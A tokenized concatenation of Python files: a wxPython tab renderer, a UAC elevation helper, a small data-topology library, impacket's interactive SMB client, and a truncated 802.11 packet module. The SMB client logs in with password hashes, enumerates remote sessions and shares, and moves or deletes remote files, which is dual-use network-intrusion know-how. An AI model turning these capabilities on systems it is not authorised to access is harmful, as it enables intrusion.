control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + leftw - <NUM_LIT:2> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + <NUM_LIT:1> , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - rightw + <NUM_LIT:2> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + <NUM_LIT:1> , <EOL> close_button_width , tab_height ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> rect . y -= <NUM_LIT:1> <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent </s>
<s> from __future__ import print_function <EOL> import sys , os , traceback , types <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> text_type = basestring <EOL> else : <EOL> text_type = str <EOL> def isUserAdmin ( ) : <EOL> if os . name == '<STR_LIT>' : <EOL> import ctypes <EOL> try : <EOL> return ctypes . windll . shell32 . IsUserAnAdmin ( ) <EOL> except : <EOL> traceback . print_exc ( ) <EOL> print ( "<STR_LIT>" ) <EOL> return False <EOL> elif os . name == '<STR_LIT>' : <EOL> return os . getuid ( ) == <NUM_LIT:0> <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" % ( os . name , ) ) <EOL> def runAsAdmin ( cmdLine = None , wait = True ) : <EOL> if os . name != '<STR_LIT>' : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> import win32api , win32con , win32event , win32process <EOL> from win32com . shell . shell import ShellExecuteEx <EOL> from win32com . shell import shellcon <EOL> python_exe = sys . executable <EOL> if cmdLine is None : <EOL> cmdLine = [ python_exe ] + sys . argv <EOL> elif not hasattr ( cmdLine , "<STR_LIT>" ) or isinstance ( cmdLine , text_type ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> cmd = '<STR_LIT>' % ( cmdLine [ <NUM_LIT:0> ] , ) <EOL> params = "<STR_LIT:U+0020>" . join ( [ '<STR_LIT>' % ( x , ) for x in cmdLine [ <NUM_LIT:1> : ] ] ) <EOL> cmdDir = '<STR_LIT>' <EOL> showCmd = win32con . SW_SHOWNORMAL <EOL> lpVerb = '<STR_LIT>' <EOL> procInfo = ShellExecuteEx ( nShow = showCmd , <EOL> fMask = shellcon . SEE_MASK_NOCLOSEPROCESS , <EOL> lpVerb = lpVerb , <EOL> lpFile = cmd , <EOL> lpParameters = params ) <EOL> if wait : <EOL> procHandle = procInfo [ '<STR_LIT>' ] <EOL> obj = win32event . WaitForSingleObject ( procHandle , win32event . INFINITE ) <EOL> rc = win32process . GetExitCodeProcess ( procHandle ) <EOL> else : <EOL> rc = None <EOL> return rc </s>
<s> from hydro . topology_base import Topology <EOL> from hydro . exceptions import HydroException <EOL> from copy import deepcopy <EOL> __author__ = '<STR_LIT>' <EOL> class ResultSet ( object ) : <EOL> def __init__ ( self , plan , stream ) : <EOL> self . stream = stream <EOL> self . plan = plan <EOL> class HydroBase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _topologies = dict ( ) <EOL> def return_topology_callback_if_exist ( self , topology ) : <EOL> if topology in self . _topologies : <EOL> return self . _topologies [ topology ] . submit <EOL> return None <EOL> def register ( self , name , obj ) : <EOL> if not isinstance ( obj , Topology ) : <EOL> raise HydroException ( "<STR_LIT>" ) <EOL> self . _topologies [ name ] = obj <EOL> def submit ( self , name , params = None ) : <EOL> topology = self . _topologies . get ( name , None ) <EOL> if not topology : <EOL> raise HydroException ( "<STR_LIT>" ) <EOL> topology . query_engine . set_topology_lookup_callback ( self . return_topology_callback_if_exist ) <EOL> topology . query_engine . set_topology_cache_ttl_callback ( topology . topology_cache_ttl_callback ) <EOL> data = topology . submit ( deepcopy ( params ) ) <EOL> execution_plan = topology . get_execution_plan ( ) <EOL> return ResultSet ( execution_plan , data ) <EOL> class LocalHydro ( HydroBase ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> __author__ = '<STR_LIT>' <EOL> from hydro import Configurator <EOL> from hydro . base_classes import HydroStr , HydroDatetime , HydroList <EOL> conf = Configurator . config_builder ( ) <EOL> conf . OPTIMIZER = '<STR_LIT>' <EOL> conf . PLAN_ALLOWED_PARAMETERS = { '<STR_LIT>' : { '<STR_LIT:type>' : HydroStr } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : HydroDatetime } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : HydroDatetime } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : HydroList } <EOL> } </s>
<s> import sys <EOL> import time <EOL> import logging <EOL> import argparse <EOL> import cmd <EOL> import os <EOL> from impacket . examples import logger <EOL> from impacket import version <EOL> from impacket . dcerpc . v5 import samr , transport , srvs <EOL> from impacket . dcerpc . v5 . dtypes import NULL <EOL> from impacket . smbconnection import * <EOL> try : <EOL> import pyreadline as readline <EOL> except ImportError : <EOL> import readline <EOL> class MiniImpacketShell ( cmd . Cmd ) : <EOL> def __init__ ( self , smbClient ) : <EOL> cmd . Cmd . __init__ ( self ) <EOL> self . prompt = '<STR_LIT>' <EOL> self . smb = smbClient <EOL> self . username , self . password , self . domain , self . lmhash , self . nthash , self . aesKey , self . TGT , self . TGS = smbClient . getCredentials ( ) <EOL> self . tid = None <EOL> self . intro = '<STR_LIT>' <EOL> self . pwd = '<STR_LIT>' <EOL> self . share = None <EOL> self . loggedIn = True <EOL> self . last_output = None <EOL> self . completion = [ ] <EOL> def emptyline ( self ) : <EOL> pass <EOL> def precmd ( self , line ) : <EOL> return line . decode ( '<STR_LIT:utf-8>' ) <EOL> def onecmd ( self , s ) : <EOL> retVal = False <EOL> try : <EOL> retVal = cmd . Cmd . onecmd ( self , s ) <EOL> except Exception , e : <EOL> logging . error ( e ) <EOL> return retVal <EOL> def do_exit ( self , line ) : <EOL> return True <EOL> def do_shell ( self , line ) : <EOL> output = os . popen ( line ) . read ( ) <EOL> print output <EOL> self . last_output = output <EOL> def do_help ( self , line ) : <EOL> print """<STR_LIT>""" <EOL> def do_password ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> from getpass import getpass <EOL> newPassword = getpass ( "<STR_LIT>" ) <EOL> rpctransport = transport . SMBTransport ( self . smb . getRemoteHost ( ) , filename = r'<STR_LIT>' , smb_connection = self . smb ) <EOL> dce = rpctransport . get_dce_rpc ( ) <EOL> dce . connect ( ) <EOL> dce . bind ( samr . MSRPC_UUID_SAMR ) <EOL> samr . hSamrUnicodeChangePasswordUser2 ( dce , '<STR_LIT:\x00>' , self . username , self . password , newPassword , self . lmhash , self . nthash ) <EOL> self . password = newPassword <EOL> self . lmhash = None <EOL> self . nthash = None <EOL> def do_open ( self , line ) : <EOL> l = line . split ( '<STR_LIT:U+0020>' ) <EOL> port = <NUM_LIT> <EOL> if len ( l ) > <NUM_LIT:0> : <EOL> host = l [ <NUM_LIT:0> ] <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> port = int ( l [ <NUM_LIT:1> ] ) <EOL> if port == <NUM_LIT> : <EOL> self . smb = SMBConnection ( '<STR_LIT>' , host , sess_port = port ) <EOL> else : <EOL> self . smb = SMBConnection ( host , host , sess_port = port ) <EOL> dialect = self . smb . getDialect ( ) <EOL> if dialect == SMB_DIALECT : <EOL> logging . info ( "<STR_LIT>" ) <EOL> elif dialect == SMB2_DIALECT_002 : <EOL> logging . info ( "<STR_LIT>" ) <EOL> elif dialect == SMB2_DIALECT_21 : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . share = None <EOL> self . tid = None <EOL> self . pwd = '<STR_LIT>' <EOL> self . loggedIn = False <EOL> self . password = None <EOL> self . lmhash = None <EOL> self . nthash = None <EOL> self . username = None <EOL> def do_login ( self , line ) : <EOL> if self . smb is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> l = line . split ( '<STR_LIT:U+0020>' ) <EOL> username = '<STR_LIT>' <EOL> password = '<STR_LIT>' <EOL> domain = '<STR_LIT>' <EOL> if len ( l ) > <NUM_LIT:0> : <EOL> username = l [ <NUM_LIT:0> ] <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> password = l [ <NUM_LIT:1> ] <EOL> if username . find ( '<STR_LIT:/>' ) > <NUM_LIT:0> : <EOL> domain , username = username . split ( '<STR_LIT:/>' ) <EOL> if password == '<STR_LIT>' and username != '<STR_LIT>' : <EOL> from getpass import getpass <EOL> password = getpass ( "<STR_LIT>" ) <EOL> self . smb . login ( username , password , domain = domain ) <EOL> self . password = password <EOL> self . username = username <EOL> if self . smb . isGuestSession ( ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . loggedIn = True <EOL> def do_kerberos_login ( self , line ) : <EOL> if self . smb is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> l = line . split ( '<STR_LIT:U+0020>' ) <EOL> username = '<STR_LIT>' <EOL> password = '<STR_LIT>' <EOL> domain = '<STR_LIT>' <EOL> if len ( l ) > <NUM_LIT:0> : <EOL> username = l [ <NUM_LIT:0> ] <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> password = l [ <NUM_LIT:1> ] <EOL> if username . find ( '<STR_LIT:/>' ) > <NUM_LIT:0> : <EOL> domain , username = username . split ( '<STR_LIT:/>' ) <EOL> if domain == '<STR_LIT>' : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> if password == '<STR_LIT>' and username != '<STR_LIT>' : <EOL> from getpass import getpass <EOL> password = getpass ( "<STR_LIT>" ) <EOL> self . smb . kerberosLogin ( username , password , domain = domain ) <EOL> self . password = password <EOL> self . username = username <EOL> if self . smb . isGuestSession ( ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . loggedIn = True <EOL> def do_login_hash ( self , line ) : <EOL> if self . smb is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> l = line . split ( '<STR_LIT:U+0020>' ) <EOL> domain = '<STR_LIT>' <EOL> if len ( l ) > <NUM_LIT:0> : <EOL> username = l [ <NUM_LIT:0> ] <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> hashes = l [ <NUM_LIT:1> ] <EOL> else : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> if username . find ( '<STR_LIT:/>' ) > <NUM_LIT:0> : <EOL> domain , username = username . split ( '<STR_LIT:/>' ) <EOL> lmhash , nthash = hashes . split ( '<STR_LIT::>' ) <EOL> self . smb . login ( username , '<STR_LIT>' , domain , lmhash = lmhash , nthash = nthash ) <EOL> self . username = username <EOL> self . lmhash = lmhash <EOL> self . nthash = nthash <EOL> if self . smb . isGuestSession ( ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . loggedIn = True <EOL> def do_logoff ( self , line ) : <EOL> if self . smb is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> self . smb . logoff ( ) <EOL> del self . smb <EOL> self . share = None <EOL> self . smb = None <EOL> self . tid = None <EOL> self . pwd = '<STR_LIT>' <EOL> self . loggedIn = False <EOL> self . password = None <EOL> self . lmhash = None <EOL> self . nthash = None <EOL> self . username = None <EOL> def do_info ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> rpctransport = transport . SMBTransport ( self . smb . getRemoteHost ( ) , filename = r'<STR_LIT>' , smb_connection = self . smb ) <EOL> dce = rpctransport . get_dce_rpc ( ) <EOL> dce . connect ( ) <EOL> dce . bind ( srvs . MSRPC_UUID_SRVS ) <EOL> resp = srvs . hNetrServerGetInfo ( dce , <NUM_LIT> ) <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> def do_who ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> rpctransport = transport . SMBTransport ( self . smb . getRemoteHost ( ) , filename = r'<STR_LIT>' , smb_connection = self . smb ) <EOL> dce = rpctransport . get_dce_rpc ( ) <EOL> dce . connect ( ) <EOL> dce . bind ( srvs . MSRPC_UUID_SRVS ) <EOL> resp = srvs . hNetrSessionEnum ( dce , NULL , NULL , <NUM_LIT:10> ) <EOL> for session in resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> print "<STR_LIT>" % ( session [ '<STR_LIT>' ] [ : - <NUM_LIT:1> ] , session [ '<STR_LIT>' ] [ : - <NUM_LIT:1> ] , session [ '<STR_LIT>' ] , session [ '<STR_LIT>' ] ) <EOL> def do_shares ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> resp = self . smb . listShares ( ) <EOL> for i in range ( len ( resp ) ) : <EOL> print resp [ i ] [ '<STR_LIT>' ] [ : - <NUM_LIT:1> ] <EOL> def do_use ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> self . share = line <EOL> self . tid = self . smb . connectTree ( line ) <EOL> self . pwd = '<STR_LIT:\\>' <EOL> self . do_ls ( '<STR_LIT>' , False ) <EOL> def complete_cd ( self , text , line , begidx , endidx ) : <EOL> return self . complete_get ( text , line , begidx , endidx , include = <NUM_LIT:2> ) <EOL> def do_cd ( self , line ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> p = string . replace ( line , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> oldpwd = self . pwd <EOL> if p [ <NUM_LIT:0> ] == '<STR_LIT:\\>' : <EOL> self . pwd = line <EOL> else : <EOL> self . pwd = ntpath . join ( self . pwd , line ) <EOL> self . pwd = ntpath . normpath ( self . pwd ) <EOL> try : <EOL> fid = self . smb . openFile ( self . tid , self . pwd , creationOption = FILE_DIRECTORY_FILE , desiredAccess = FILE_READ_DATA | FILE_LIST_DIRECTORY , shareMode = FILE_SHARE_READ | FILE_SHARE_WRITE ) <EOL> self . smb . closeFile ( self . tid , fid ) <EOL> except SessionError : <EOL> self . pwd = oldpwd <EOL> raise <EOL> def do_lcd ( self , s ) : <EOL> print s <EOL> if s == '<STR_LIT>' : <EOL> print os . getcwd ( ) <EOL> else : <EOL> os . chdir ( s ) <EOL> def do_pwd ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> print self . pwd <EOL> def do_ls ( self , wildcard , display = True ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> if wildcard == '<STR_LIT>' : <EOL> pwd = ntpath . join ( self . pwd , '<STR_LIT:*>' ) <EOL> else : <EOL> pwd = ntpath . join ( self . pwd , wildcard ) <EOL> self . completion = [ ] <EOL> pwd = string . replace ( pwd , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> pwd = ntpath . normpath ( pwd ) <EOL> for f in self . smb . listPath ( self . share , pwd ) : <EOL> if display is True : <EOL> print "<STR_LIT>" % ( '<STR_LIT:d>' if f . is_directory ( ) > <NUM_LIT:0> else '<STR_LIT:->' , f . get_filesize ( ) , time . ctime ( float ( f . get_mtime_epoch ( ) ) ) , f . get_longname ( ) ) <EOL> self . completion . append ( ( f . get_longname ( ) , f . is_directory ( ) ) ) <EOL> def do_rm ( self , filename ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> f = ntpath . join ( self . pwd , filename ) <EOL> file = string . replace ( f , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> self . smb . deleteFile ( self . share , file ) <EOL> def do_mkdir ( self , path ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> p = ntpath . join ( self . pwd , path ) <EOL> pathname = string . replace ( p , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> self . smb . createDirectory ( self . share , pathname ) <EOL> def do_rmdir ( self , path ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> p = ntpath . join ( self . pwd , path ) <EOL> pathname = string . replace ( p , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> self . smb . deleteDirectory ( self . share , pathname ) <EOL> def do_put ( self , pathname ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> src_path = pathname <EOL> dst_name = os . path . basename ( src_path ) <EOL> fh = open ( pathname , '<STR_LIT:rb>' ) <EOL> f = ntpath . join ( self . pwd , dst_name ) <EOL> finalpath = string . replace ( f , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> self . smb . putFile ( self . share , finalpath , fh . read ) <EOL> fh . close ( ) <EOL> def complete_get ( self , text , line , begidx , endidx , include = <NUM_LIT:1> ) : <EOL> p = string . replace ( line , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> if p . find ( '<STR_LIT:\\>' ) < <NUM_LIT:0> : <EOL> items = [ ] <EOL> if include == <NUM_LIT:1> : <EOL> mask = <NUM_LIT:0> <EOL> else : <EOL> mask = <NUM_LIT> <EOL> for i in self . completion : <EOL> if i [ <NUM_LIT:1> ] == mask : <EOL> items . append ( i [ <NUM_LIT:0> ] ) <EOL> if text : <EOL> return [ <EOL> item for item in items <EOL> if item . upper ( ) . startswith ( text . upper ( ) ) <EOL> ] <EOL> else : <EOL> return items <EOL> def do_get ( self , filename ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> filename = string . replace ( filename , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> fh = open ( ntpath . basename ( filename ) , '<STR_LIT:wb>' ) <EOL> pathname = ntpath . join ( self . pwd , filename ) <EOL> try : <EOL> self . smb . getFile ( self . share , pathname , fh . write ) <EOL> except : <EOL> fh . close ( ) <EOL> os . remove ( filename ) <EOL> raise <EOL> fh . close ( ) <EOL> def do_close ( self , line ) : <EOL> self . do_logoff ( line ) <EOL> def main ( ) : <EOL> logger . init ( ) <EOL> print version . BANNER <EOL> parser = argparse . ArgumentParser ( add_help = True , description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT:target>' , action = '<STR_LIT:store>' , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , type = argparse . FileType ( '<STR_LIT:r>' ) , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> group = parser . add_argument_group ( '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , metavar = "<STR_LIT>" , help = '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store_true>" , help = '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store_true>" , help = '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , metavar = "<STR_LIT>" , help = '<STR_LIT>' ) <EOL> if len ( sys . argv ) == <NUM_LIT:1> : <EOL> parser . print_help ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> options = parser . parse_args ( ) <EOL> if options . debug is True : <EOL> logging . getLogger ( ) . setLevel ( logging . DEBUG ) <EOL> else : <EOL> logging . getLogger ( ) . setLevel ( logging . INFO ) <EOL> import re <EOL> domain , username , password , address = re . compile ( '<STR_LIT>' ) . match ( options . target ) . groups ( '<STR_LIT>' ) <EOL> if '<STR_LIT:@>' in address : <EOL> password = password + '<STR_LIT:@>' + address . rpartition ( '<STR_LIT:@>' ) [ <NUM_LIT:0> ] <EOL> address = address . rpartition ( '<STR_LIT:@>' ) [ <NUM_LIT:2> ] <EOL> if domain is None : <EOL> domain = '<STR_LIT>' <EOL> if password == '<STR_LIT>' and username != '<STR_LIT>' and options . hashes is None and options . no_pass is False and options . aesKey is None : <EOL> from getpass import getpass <EOL> password = getpass ( "<STR_LIT>" ) <EOL> if options . aesKey is not None : <EOL> options . k = True <EOL> if options . hashes is not None : <EOL> lmhash , nthash = options . hashes . split ( '<STR_LIT::>' ) <EOL> else : <EOL> lmhash = '<STR_LIT>' <EOL> nthash = '<STR_LIT>' <EOL> try : <EOL> smbClient = SMBConnection ( address , address ) <EOL> if options . k is True : <EOL> smbClient . kerberosLogin ( username , password , domain , lmhash , nthash , options . aesKey ) <EOL> else : <EOL> smbClient . login ( username , password , domain , lmhash , nthash ) <EOL> shell = MiniImpacketShell ( smbClient ) <EOL> if options . file is not None : <EOL> logging . info ( "<STR_LIT>" % options . file . name ) <EOL> for line in options . file . readlines ( ) : <EOL> if line [ <NUM_LIT:0> ] != '<STR_LIT:#>' : <EOL> print "<STR_LIT>" % line , <EOL> shell . onecmd ( line ) <EOL> else : <EOL> print line , <EOL> else : <EOL> shell . cmdloop ( ) <EOL> except Exception , e : <EOL> logging . error ( str ( e ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> pass </s>
<s> import struct <EOL> import string <EOL> from binascii import crc32 <EOL> from ImpactPacket import ProtocolPacket <EOL> from Dot11Crypto import RC4 <EOL> frequency = { <EOL> <NUM_LIT> : <NUM_LIT:1> , <NUM_LIT> : <NUM_LIT:2> , <NUM_LIT> : <NUM_LIT:3> , <NUM_LIT> : <NUM_LIT:4> , <NUM_LIT> : <NUM_LIT:5> , <NUM_LIT> : <NUM_LIT:6> , <NUM_LIT> : <NUM_LIT:7> , <NUM_LIT> : <NUM_LIT:8> , <NUM_LIT> : <NUM_LIT:9> , <EOL> <NUM_LIT> : <NUM_LIT:10> , <NUM_LIT> : <NUM_LIT:11> , <NUM_LIT> : <NUM_LIT:12> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:64> , <NUM_LIT> : <NUM_LIT:100> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> } <EOL> class Dot11ManagementCapabilities ( ) : <EOL> CAPABILITY_RESERVED_1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_2 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_DSSS_OFDM = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_3 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_4 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_SHORT_SLOT_TIME = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_5 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_6 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_CH_AGILITY = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_PBCC = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_SHORT_PREAMBLE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_PRIVACY = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_CF_POLL_REQ = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_CF_POLLABLE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_IBSS = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_ESS = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> class Dot11Types ( ) : <EOL> DOT11_TYPE_MANAGEMENT = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_REQUEST = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_RESPONSE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_REQUEST = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_RESPONSE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_PROBE_REQUEST = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_PROBE_RESPONSE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_RESERVED1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_RESERVED2 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_BEACON = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_ATIM = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_AUTHENTICATION = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_DEAUTHENTICATION = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_ACTION 